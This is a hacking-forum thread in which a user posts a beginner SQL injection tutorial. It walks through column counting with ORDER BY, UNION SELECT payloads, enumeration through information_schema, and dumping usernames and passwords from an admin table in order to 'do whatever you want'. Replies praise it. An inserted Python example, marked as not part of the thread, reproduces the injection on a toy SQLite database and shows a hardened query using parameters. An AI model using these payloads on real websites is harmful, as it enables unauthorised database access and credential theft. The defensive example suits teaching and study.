[Tutorial] Blazer First Sql Injection Tutorial!!!!!
[Tutorial] Blazer First Sql Injection Tutorial!!!!! #1
1. Find a vulnerable website. Here is an example!

2.
http://www.site.com/index.php?=5'

PS: Don't type error after this (--)

3.
http://www.site.com/index.php?=5 order by 10-- error

http://www.site.com/index.php?=5 order by 9-- error

http://www.site.com/index.php?=5 order by 8-- No error
:cheers:

4. The site has 8 columns.

5. Do like below :)

6.
http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--

7. This will show some numbers on the page; let's say it is number 3 on the page.

8. Let's get some tables:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--

9. You will see tables: check for anything like admin, username, user. I found admin, and let's start harvesting :)

10. Type this:
http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--

11. Now you have the table name, and the name is admin, which you found before this. Now the columns that you will see right now are maybe Username or Password.

12. So to get the password and username from admin, type this.

13.
http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin

14. And press enter.

15. You will see this: username:password.
PS: The password can be plain text or in a hash :)
16. Now get the admin page and log in and do whatever you want.

17. Credits to blazer15. :cheers:

I tried my best, but I hope it will help you :) :blackhat:

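Why the requests in the tutorial above behave as described, and what stops them, as an added example that is not part of the original thread. Python with an in-memory SQLite database stands in for the PHP/MySQL site; the `news` and `admin` tables, their contents, and all function names are constructed assumptions, and the request values are cut down to 3 columns.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data: a 3-column content table and an admin table.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO news VALUES (5, 'Welcome', 'Hello world');
        INSERT INTO admin VALUES ('root', 'constructed-hash');
    """)
    return db

def get_news_vulnerable(db, raw_id):
    # BEFORE: the request value is pasted into the SQL text, so whatever
    # follows the number (ORDER BY, UNION SELECT, ...) is parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_news_hardened(db, raw_id):
    # AFTER: accept only a short run of ASCII digits, then bind the value.
    # A bound parameter is sent as data and cannot change the statement.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe(fn, raw_id):
    # Run one request value against a fresh database and report the rows,
    # or the SQL error that would otherwise be reflected in the page.
    db = make_db()
    try:
        return fn(db, raw_id)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

# Request values shaped like the thread's steps, cut down to 3 columns.
SAMPLES = ["5", "5'", "5 order by 4--", "5 order by 3--",
           "-5 union select 1,username,password from admin--"]

if __name__ == "__main__":
    for value in SAMPLES:
        print(repr(value))
        print("  vulnerable:", probe(get_news_vulnerable, value))
        print("  hardened:  ", probe(get_news_hardened, value))
```

With the concatenated query, the error/no-error difference and the leaked `admin` row both appear; with the validated and bound query, every non-numeric value returns no rows and no SQL error.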

RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! #2
Great tutorial, I really need to learn more about SQLi, although please work on your grammar :)
Wavy baby


RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! #3
(12-13-2012, 02:06 AM)Cyber-Savage Wrote: Great tutorial, I really need to learn more about SQLi, although please work on your grammar :)
Thank you very much :)!


RE: [Tutorial] Blazer First Sql Injection Tutorial!!!!! #4
Decent TUT, looks like you put it together in under 30 mins though. Might want to make it more of a walk-through.
